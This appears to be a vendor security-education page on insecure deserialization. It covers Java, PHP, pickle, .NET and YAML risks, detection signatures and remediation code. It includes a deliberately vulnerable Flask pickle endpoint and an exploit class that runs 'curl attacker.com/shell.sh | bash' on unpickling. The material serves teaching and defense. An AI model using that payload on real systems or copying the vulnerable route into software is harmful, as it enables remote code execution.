Insecure Deserialization
Insecure Deserialization allows attackers to manipulate serialized objects to achieve remote code execution, privilege escalation, or data tampering by exploiting an application's trust in serialized data.
Technical Description
Insecure Deserialization occurs when an application deserializes (reconstructs objects from their serialized byte or string representation) untrusted data without adequate validation. Serialization is used to persist objects, transmit them across networks, or store them in caches and sessions. When an attacker can manipulate serialized data, they can alter application logic, tamper with data, or, most critically, achieve remote code execution.
The severity of deserialization vulnerabilities depends on the serialization format and the available “gadget chains” in the application’s classpath or runtime:
- Java Deserialization: Java’s native ObjectInputStream.readObject() is notoriously dangerous. Libraries like Apache Commons Collections, Spring, and others contain gadget chains that transform deserialization into arbitrary code execution. Tools like ysoserial generate payloads for dozens of known gadget chains.
- PHP Object Injection: PHP’s unserialize() function can instantiate arbitrary classes and invoke magic methods (__wakeup(), __destruct(), __toString()). Attackers chain these magic methods through application or framework classes to achieve file operations, SQL injection, or code execution.
- Python Pickle: Python’s pickle module executes arbitrary Python code during deserialization by design. The __reduce__ method lets an object name a callable and its arguments, and that callable runs when the object is unpickled.
- .NET Deserialization: BinaryFormatter, SoapFormatter, and other .NET serializers are vulnerable to gadget-chain attacks similar to Java. Microsoft marked BinaryFormatter obsolete in .NET 5 and removed its implementation in .NET 9.
- YAML Deserialization: YAML parsers in Python (yaml.load()), Ruby (YAML.load()), and other languages can instantiate arbitrary objects if used without safe loaders.
# Vulnerable - pickle deserialization of user input
import base64
import pickle

from flask import Flask, render_template, request

app = Flask(__name__)

@app.route('/load-session')
def load_session():
    data = base64.b64decode(request.cookies.get('session_data'))
    session = pickle.loads(data)  # Arbitrary code execution
    return render_template('dashboard.html', user=session)

# Attacker crafts a malicious pickle payload:
import os

class Exploit:
    def __reduce__(self):
        # On unpickling, pickle calls os.system with this argument
        return (os.system, ('curl attacker.com/shell.sh | bash',))
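The mechanism behind the Exploit class can be observed safely by swapping the dangerous callable for a harmless one. The following is a minimal sketch, not taken from the original example: the class name Demo and the choice of eval with a fixed arithmetic string are illustrative assumptions.

```python
import pickle


class Demo:
    """Hypothetical class; stands in for the Exploit class with a harmless payload."""

    def __reduce__(self):
        # pickle records "call eval('6 * 7')" instead of the object's state.
        # A real attacker would name os.system or a similar callable here.
        return (eval, ("6 * 7",))


payload = pickle.dumps(Demo())

# Unpickling does not rebuild a Demo instance. It calls the recorded
# callable with the recorded arguments and returns whatever that produces.
result = pickle.loads(payload)
```

Here result is the integer 42 rather than a Demo object, which shows that the receiving side ran an expression chosen entirely by whoever produced the payload.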
Serialized data appears in multiple locations: cookies, hidden form fields, API request/response bodies, message queues, cache stores (Redis, Memcached), and inter-service communication.
Real-World Impact
Insecure deserialization has enabled some of the most severe compromises in enterprise environments:
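- Equifax (2017): The breach, which exposed the records of roughly 147 million people, was enabled by CVE-2017-5638 in Apache Struts. Strictly speaking, that flaw is OGNL expression injection through the Content-Type header handled by the Jakarta Multipart parser rather than native Java deserialization, but it belongs to the same class of failure: attacker-supplied data is interpreted as executable structure, leading to remote code execution.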
- Apache Commons Collections (2015): A gadget chain in this widely deployed library turned Java deserialization into remote code execution in enterprise products including WebLogic, JBoss, Jenkins, and WebSphere. FoxGlove Security’s November 2015 write-up published working exploits for these products and showed that an application deserializing untrusted data with the library on its classpath was exposed.
- PayPal (2015): Researchers discovered a Java deserialization vulnerability in PayPal’s production systems that allowed remote code execution through crafted serialized objects.
Deserialization vulnerabilities are particularly impactful because they frequently lead directly to remote code execution with the privileges of the application server, often root or a service account with broad access.
Detection Methodology
Identifying deserialization vulnerabilities requires knowledge of serialization formats and where they appear:
- Serialized Data Identification: Look for common serialization signatures in all application inputs. Java serialized objects begin with 0xACED0005 (base64: rO0AB). PHP serialized data follows patterns like O:4:"User":2:{...}. Python pickle starts with 0x80 or protocol-specific bytes. JSON and XML may contain type discriminators.
- Technology Stack Analysis: Identify the application’s language, frameworks, and libraries. Research known gadget chains available for the detected technology stack.
- Input Manipulation: Modify serialized objects in transit. Change field values, inject unexpected types, and extend objects with additional properties. Observe how the application handles malformed serialized data.
- Gadget Chain Testing: For Java applications, use ysoserial to generate payloads for all known gadget chains against each deserialization entry point. For PHP, use PHPGGC. Monitor for out-of-band callbacks (DNS, HTTP) to confirm blind code execution.
- Code Review: Search source code for dangerous deserialization functions: ObjectInputStream.readObject(), unserialize(), pickle.loads(), yaml.load(), BinaryFormatter.Deserialize(), and JSON.parse() with custom revivers that instantiate objects.
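The signature checks from the first step can be sketched as a small classifier. This is a rough heuristic under stated assumptions: the function name guess_format and its labels are hypothetical, the pickle check only covers protocols 2 through 5 (which open with the 0x80 PROTO opcode), and a match means "worth a closer look", not a confirmed vulnerability.

```python
import re

JAVA_MAGIC = bytes.fromhex("aced0005")  # Java stream magic plus version
JAVA_MAGIC_B64 = b"rO0AB"               # the same bytes after base64 encoding
PHP_OBJECT = re.compile(rb'^O:\d+:"[^"]+":\d+:\{')  # e.g. O:4:"User":2:{...}


def guess_format(raw: bytes) -> str:
    """Return a best-effort label for one raw input value (hypothetical helper)."""
    if raw.startswith(JAVA_MAGIC):
        return "java"
    if raw.startswith(JAVA_MAGIC_B64):
        return "java-base64"
    if PHP_OBJECT.match(raw):
        return "php"
    # Pickle protocols 2-5 begin with the PROTO opcode 0x80 and a version byte.
    if len(raw) >= 2 and raw[0] == 0x80 and 2 <= raw[1] <= 5:
        return "pickle"
    return "unknown"


samples = [
    b"rO0ABXNyABFqYXZhLnV0aWw",
    b'O:4:"User":2:{s:4:"name";s:5:"alice";}',
    b"\x80\x04\x95\x10\x00",
    b'{"user": "alice"}',
]
labels = [guess_format(s) for s in samples]
```

For the four samples, labels comes out as java-base64, php, pickle, and unknown. Values that are base64-encoded or URL-encoded more than once would need to be decoded before being passed to a check like this.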
How Revaizor Discovers This
Revaizor’s AI agents bring deep expertise in deserialization vulnerability discovery:
- Serialization Format Detection: Revaizor identifies serialized data across all input vectors, recognizing Java, PHP, Python, .NET, and YAML serialization formats in cookies, headers, API bodies, and hidden fields. It detects both standard and custom serialization patterns.
- Technology-Specific Payloads: Based on the detected technology stack, Revaizor generates targeted deserialization payloads using the appropriate gadget chains. For Java, it tests all viable ysoserial chains based on detected classpath libraries. For PHP, it leverages PHPGGC chains matched to the application’s framework.
- Blind Exploitation: Revaizor uses out-of-band techniques (DNS and HTTP callbacks) to confirm deserialization-based code execution even when the application does not return error messages or direct output.
- Library Fingerprinting: Revaizor identifies specific library versions on the classpath through error messages, response headers, and behavioral analysis, focusing payload generation on gadget chains known to work with the detected versions.
Remediation
The most effective defense is to avoid deserializing untrusted data entirely:
# Vulnerable - pickle with untrusted input
session = pickle.loads(user_cookie)

# Secure - use JSON or signed tokens instead
import base64
import hmac
import json

def load_session(cookie, secret_key):
    # Cookie format: <base64 JSON>.<hex HMAC-SHA256>; secret_key must be bytes
    data, signature = cookie.rsplit('.', 1)
    expected_sig = hmac.new(secret_key, data.encode(), 'sha256').hexdigest()
    # Constant-time comparison avoids leaking the signature through timing
    if not hmac.compare_digest(signature, expected_sig):
        raise ValueError("Invalid session signature")
    return json.loads(base64.b64decode(data))
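The loader only makes sense alongside the code that issues the cookie. A minimal sketch of the full round trip follows, assuming a cookie layout of base64 JSON, a dot, then a hex HMAC-SHA256. The function name sign_session and the key handling are illustrative assumptions, and load_session is restated so the block runs on its own.

```python
import base64
import hashlib
import hmac
import json


def sign_session(session: dict, secret_key: bytes) -> str:
    """Serialize a session as JSON and append an HMAC-SHA256 signature."""
    data = base64.b64encode(json.dumps(session).encode()).decode()
    signature = hmac.new(secret_key, data.encode(), hashlib.sha256).hexdigest()
    return f"{data}.{signature}"


def load_session(cookie: str, secret_key: bytes) -> dict:
    """Verify the signature first, and only then parse the JSON payload."""
    data, _, signature = cookie.rpartition(".")
    expected = hmac.new(secret_key, data.encode(), hashlib.sha256).hexdigest()
    # Compare as bytes so non-ASCII input cannot raise a TypeError.
    if not hmac.compare_digest(signature.encode(), expected.encode()):
        raise ValueError("Invalid session signature")
    return json.loads(base64.b64decode(data))


key = b"example-key-load-from-secret-storage"  # placeholder, not a real secret
cookie = sign_session({"user": "alice", "role": "member"}, key)
session = load_session(cookie, key)
```

Because the payload is JSON, a forged cookie that somehow passed verification could still only yield dictionaries, lists, strings, and numbers, never an arbitrary object. The signature does not stop an old valid cookie from being replayed, so an expiry timestamp inside the signed payload is a common addition.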
// Java - use ObjectInputFilter (Java 9+) to restrict deserialization
// ALLOWED_CLASSES is an application-defined Set<String> of permitted class names
ObjectInputStream ois = new ObjectInputStream(inputStream);
ois.setObjectInputFilter(filterInfo -> {
    if (filterInfo.serialClass() != null) {
        String className = filterInfo.serialClass().getName();
        if (ALLOWED_CLASSES.contains(className)) {
            return ObjectInputFilter.Status.ALLOWED;
        }
        return ObjectInputFilter.Status.REJECTED;
    }
    return ObjectInputFilter.Status.UNDECIDED;
});
Comprehensive deserialization defense:
- Eliminate Native Serialization: Replace Java Serializable, PHP serialize()/unserialize(), and Python pickle with safe data formats like JSON, Protocol Buffers, or MessagePack for inter-process and client-server communication.
- Digital Signatures: If serialized data must be used, sign it with HMAC or asymmetric signatures and verify the signature before deserialization. This prevents tampering but not replay attacks.
- Deserialization Filtering: In Java, use ObjectInputFilter to allowlist only the specific classes that should be deserialized. In Python, use yaml.safe_load() instead of yaml.load().
- Isolation: Run deserialization in sandboxed environments with restricted permissions. Use containers or VMs for processing untrusted serialized data.
- Library Updates: Keep all libraries updated. Many deserialization gadget chains are patched in newer versions. Monitor for new gadget chain discoveries in your dependency tree.
- Runtime Protection: Deploy runtime application self-protection (RASP) or Java agent-based monitoring to detect and block deserialization attacks at runtime.
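For Python code that cannot yet move away from pickle, the allowlisting idea behind deserialization filtering can be approximated by overriding find_class on pickle.Unpickler, a pattern described in the standard library documentation. The sketch below is illustrative: the names SAFE_BUILTINS, RestrictedUnpickler, and restricted_loads, and the particular allowlist, are assumptions to adapt, and this approach narrows the attack surface without making pickle safe for untrusted input.

```python
import builtins
import io
import pickle

# Hypothetical allowlist: only these builtins may be resolved by name.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream references a global by name.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but rejects any global outside the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Malicious:
    def __reduce__(self):
        # Harmless stand-in for an attacker-chosen callable.
        return (eval, ("1 + 1",))


allowed = restricted_loads(pickle.dumps([1, 2, range(3)]))

try:
    restricted_loads(pickle.dumps(Malicious()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```

Plain containers and the allowlisted builtins load normally, while the payload that references eval is rejected before the callable is ever invoked.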